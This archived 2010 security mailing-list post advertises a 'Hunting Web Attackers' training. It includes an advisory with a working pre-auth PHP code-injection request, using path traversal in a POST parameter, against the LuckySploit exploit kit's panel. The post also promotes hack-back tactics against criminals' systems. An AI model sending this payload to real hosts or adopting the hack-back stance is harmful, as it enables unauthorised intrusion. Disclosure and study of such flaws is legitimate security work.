| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Tue, 07 Sep 2010 15:01:09 +0200 From: Laurent OUDOT at TEHTRI-Security <laurent.oudot@...tri-security.com> To: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com Subject: [TEHTRI-Security Training + 0days] "Hunting Web Attackers" at HITBSecConf Gents, We wanted to let you know that TEHTRI-Security will release many 0days and offensive technologies during a new training called : - "Hunting Web Attackers" It will be proposed during HackInTheBox SecConf Malaysia 2010 in October, in Kuala Lumpur. The 0days will be disclosed under a NDA (for students only) and will help at fighting back web attackers, as we already explained in the past in China and in Singapore (SyScan). As a teaser, this email contains one of our remote 0day exploits. We also found 0days against Zeus, Eleonore, CrimePack, etc. Our self-defense cyber-weapons will be disclosed during this training. ------ BEGIN Security Advisory ------ Vuln : TEHTRI-SA-2010-018 Tool : LuckySploit Exploit Pack Title: Remote execution in LuckySploit LuckySploit is a tool used by attackers to penetrate companies or personal computers by abusing client-side vulnerabilities. This malware exploitation kit is full of anti Microsoft technologies. By auditing this Malware, TEHTRI-Security has found a pre-auth remote exploit in the file /mod/to.php By sending a specially crafted HTTP packet with a POST argument, it's possible to simulate a configuration modification, and to inject PHP code that will be able to be executed after. Here is an example, where we modify the remote file "7.php" by adding our own PHP code inside it (PoC anti kiddies: phpinfo() added). POST sent to http://target/luckysploit/mod/to.php?mod=thread_optn&id=../../tconf/7 With arguments : z=1&exp_pre_config=2&advanced_unik=0&referer_not_empty=0&JS_MODE=0&unquie_type=0&unquie_time=10000000%3Bphpinfo%28%29%3Bexit%28%29%3B%3F%3Eaa&stat_packtime=10&country_allow_list=&referer_only=&traff_back_url=&gzip_status=1&gzip_status2=1&ip2cos=1&system_status=1&referer_status=1&puniqstatus=1&puniqblock=0 Then you can access your new remote backdoor here : http://target/luckysploit/tconf/7.php This exploit is provided by TEHTRI-Security as a technical proof to show that defenders who are under attack, might be able to strike back against a group of evil intruders trying to commit cyber crimes against them. But this should not be used out of legal field. This might help at getting the identities of attackers, or at hacking their workstations, or at destroying their tools and infrastructures (anti-cyber-war & anti-cyber-spy technologies). ------ END Security Advisory ------ If you want to be sure to have your seat for this outstanding offensive training, please do register as soon as possible (Technical Training Track3 / TT3 - Hunting Web Attackers, 11-12 October ) : http://conference.hackinthebox.org/hitbsecconf2010kul/?page_id=274 See you soon at the awesome international conference HITBSecConf Malaysia 2010, Laurent OUDOT, CEO & Founder TEHTRI-Security http://www.tehtri-security.com/ * References: - BBC => http://www.bbc.co.uk/news/10349001 - Zdnet => http://www.zdnet.com/blog/security/researchers-find-12-zero-day-flaws-targeting-5-web-malware-exploitation-kits/6752 - Btraq => http://seclists.org/bugtraq/2010/Jun/178 - HITB => http://conference.hackinthebox.org/hitbsecconf2010kul/
Powered by blists - more mailing lists